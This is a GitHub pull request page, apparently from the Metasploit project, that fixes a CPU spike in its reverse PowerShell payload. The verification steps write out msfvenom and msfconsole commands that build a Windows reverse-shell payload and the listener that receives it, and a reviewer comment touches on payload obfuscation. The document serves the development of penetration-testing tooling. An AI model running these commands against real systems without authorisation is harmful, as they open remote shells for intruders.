Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix psh template to avoid 100% cpu spike on CTRL+C #7522

Merged
merged 2 commits into from
Nov 2, 2016
Merged

Fix psh template to avoid 100% cpu spike on CTRL+C #7522

merged 2 commits into from
Nov 2, 2016

Conversation

OJ
Copy link
Contributor

@OJ OJ commented Nov 1, 2016
edited by bwatters-r7

As mentioned in #7293, using the reverse_powershell and exiting the shell without typing exit (eg, by pressing CTR+C and terminating the shell, or killing it via sessions -[K|k]) would result in the Powershell process burning the CPU to 100%.

This PR includes a tweak to the Powershell payload that makes this problem go away.

Verification

  • Create a payload: $ msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.255.1 LPORT=8000 -f raw -o ~/scratch/met/ps-cmd.bat
  • Create a matching listener: $ msfconsole -q -x 'use exploit/multi/handler; set payload cmd/windows/reverse_powershell; set LHOST 172.16.255.1; set LPORT 8000; set ExitOnSession false; run -j'
  • Run the payload bat file on a Windows target that has powershell installed.
  • Confirm a working session appears.
  • Interact with the session, run commands, then type exit.
  • Verify that the Powershell process terminates completely.
  • Run the payload bat file again.
  • Confirm a working session appears.
  • Run sessions -K to kill the session without interacting with it (or interact and press CTRL+C and terminate)
  • Verify that the Powershell process terminates completely.

Fixes #7293.

@bwatters-r7
Copy link
Contributor

@OJ did you rerun the cached value size script for payloads?

@OJ
Copy link
Contributor Author

OJ commented Nov 2, 2016

This is a great question that highlights how stupid I am! :) Thanks @bwatters-r7, doing it now.

@bwatters-r7 bwatters-r7 self-assigned this Nov 2, 2016
@sempervictus
Copy link
Contributor

I havent looked too deeply into these command payloads, but i just realized this is raw PSH with none of the entropy generating permutations Rex::Powershell provides. Are these payloads widely used? If so, is here any interest in converting them to Rex::Powershell::Script objects in generation, and for the execution call via the PSH commandline pieces?

@OJ
Copy link
Contributor Author

OJ commented Nov 2, 2016

I don't think they're used that often. If the lack of entropy becomes and issue we can throw in a bunch of updates.

Thanks for reviewing @sempervictus.

@bwatters-r7 bwatters-r7 merged commit 7895ba8 into rapid7:master Nov 2, 2016
bwatters-r7 added a commit that referenced this pull request Nov 2, 2016
@bwatters-r7
Land #7522, Fix psh template to avoid 100% cpu spike on CTRL+C
5169341
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Nov 2, 2016
edited by tdoan-r7

Release Notes

This fix addresses a bug in the powershell payload where it spiked a core on the remote CPU after termination through standard 'ctrl-c'

@void-in void-in mentioned this pull request Nov 8, 2016
Closed
3 tasks
@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Nov 28, 2016
@OJ OJ deleted the fix-ps-cmd-cpu-spike branch June 16, 2017 06:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@sempervictus sempervictus sempervictus approved these changes

Assignees

@bwatters-r7 bwatters-r7

Labels
bug payload rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@OJ @bwatters-r7 @sempervictus @tdoan-r7